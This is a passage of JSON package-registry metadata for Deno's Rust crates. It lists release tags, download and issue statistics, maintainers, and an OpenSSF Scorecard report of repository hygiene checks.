l":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T01:09:50.992Z","dependent_packages_count":3,"downloads":79411,"downloads_period":"total","dependent_repos_count":15,"rankings":{"downloads":11.684534197623202,"dependent_repos_count":6.845235845848039,"dependent_packages_count":9.170226439345255,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":5.552087266766453},"purl":"pkg:cargo/deno_typescript","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_typescript","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_typescript","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_typescript/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:35.795Z","updated_at":"2022-11-07T18:29:35.795Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:35.804Z","updated_at":"2022-11-07T18:29:35.804Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11828483,"name":"deno_crypto_provider","ecosystem":"cargo","description":"Cryptography provider for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":51,"first_release_published_at":"2025-06-23T09:18:14.497Z","latest_release_published_at":"2026-08-06T11:46:52.628Z","latest_release_number":"0.51.0","last_synced_at":"2026-08-29T21:56:51.327Z","created_at":"2025-06-23T09:31:04.447Z","updated_at":"2026-08-31T01:09:50.980Z","registry_url":"https://crates.io/crates/deno_crypto_provider/","install_command":"cargo install deno_crypto_provider","documentation_url":"https://docs.rs/deno_crypto_provider/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using 